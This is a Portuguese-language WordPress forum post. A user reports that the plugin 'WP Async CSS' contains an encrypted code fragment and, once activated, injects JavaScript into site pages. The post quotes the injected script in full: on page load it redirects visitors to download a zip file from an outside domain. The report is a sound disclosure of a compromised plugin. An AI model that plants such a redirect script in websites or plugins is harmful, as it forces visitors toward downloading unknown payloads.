Malware em plugin by WordPress
-
Malware hosted by WordPress?
Não tenho certeza se estou postando no local correto, porem quero relatar que usei o plugin “WP Async CSS” disponível na url https://downloads.wordpress.org/plugin/wp-async-css.1.2.zip e fiquei surpreso ao descobrir que o arquivo “wp-async-css.php” na linha 315 tem um fragmanto de código encriptado. Até aqui tudo bem.
Porem fiquei frustrado ao notar que, após ativar o referido plugin, foi adicionado o seguinte código javascript:
<script type="text/javascript"> window.onload = function(){ document.location = 'http://ibuyitttttttttttttttttttttttttttttttttttibuyit.com/xxx.zip'; }</script> </head><body><body bgcolor="#ffffff" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <br><br><center> <img src="http://cb.amazingcounters.com/counter.php?i=2045070&c=6135523" width="686" height="108" /></a></center>
Ao excluir o trecho de código da 315 o javascript para de carregar.
Como não sou programador e conheço pouco sobre o WordPress, peço que alguém com mais experiência, se possível, verificar e solicitar a correção do referido arquivo.
- O tópico ‘Malware em plugin by WordPress’ está fechado para novas respostas.